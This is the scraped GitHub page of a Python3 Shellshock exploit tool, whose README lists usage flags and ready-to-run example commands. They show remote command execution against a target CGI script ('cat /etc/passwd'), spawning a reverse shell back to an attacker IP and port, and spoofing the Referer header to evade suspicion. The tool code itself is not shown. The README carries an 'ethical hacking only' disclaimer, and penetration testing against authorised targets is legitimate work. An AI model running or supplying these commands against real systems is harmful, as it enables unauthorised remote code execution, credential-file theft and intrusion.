Skip to content

Python3 shellshock exploit, for ethical hacking/pentesting purposes only. Use it at your own risk. I'm not responisble if you use it with illegal purposes.

License

Notifications You must be signed in to change notification settings

sergiovks/shellshock.py-and-referer-spoofing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

Shellshock.py

Python3 shellshock exploit, for ethical hacking/pentesting purposes only. Use it at your own risk. I'm not responsible if you use it with illegal purposes.

Usage:

-u, --url To specify the target URL (root path), for example: http://example.com
-r, --route-to-cgi To specify the route to the CGI script, for example /cgi-bin/time.sh
-c, --comand To execute remote commands, for example: 'cat /etc/passwd' USE SINGLE QUOTES
-s, --shell To spawn a reverse shell (lhost and lport arguments needed)
-lh, --lhost For specifying your IPv4 to receive the reverse shell, for example: 10.10.14.6
-lp, --lport For specifying the Local Port that you want to use to receive the reverse shell, for example: 443
-to, --timeout The timeout in seconds that you want to set for the HTTP requests, default is 10.
-R, --referer-spoof If you want to use Referer Spoofing, specify a trustable URL, for example: https://www.google.com/search?q=cabecera+referer&oq=cabecera+referer&aqs=chrome..69i57j69i59l2j0l4j69i60.3531j0j7&sourceid=chrome&ie=UTF-8

You can do two things with this script, you can receive a shell, or you can execute remote commands

Example for receiving a shell:

python3 shellshock.py -u http://example.com -r /cgi-bin/time.sh -s -lh 10.10.14.6 -lp 443

Example for executing remote commands:

python3 shellshock.py -u http://example.com -r /cgi-bin/time.sh -c 'cat /etc/passwd'

If you want to make referer spoofing

Add the -R or --referer-spoof flag both for receiving a shell or executing remote commands, followed by a trustable URL, f. ex: https://www.google.com/search?q=cabecera+referer&oq=cabecera+referer&aqs=chrome..69i57j69i59l2j0l4j69i60.3531j0j7&sourceid=chrome&ie=UTF-8

About

Python3 shellshock exploit, for ethical hacking/pentesting purposes only. Use it at your own risk. I'm not responisble if you use it with illegal purposes.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages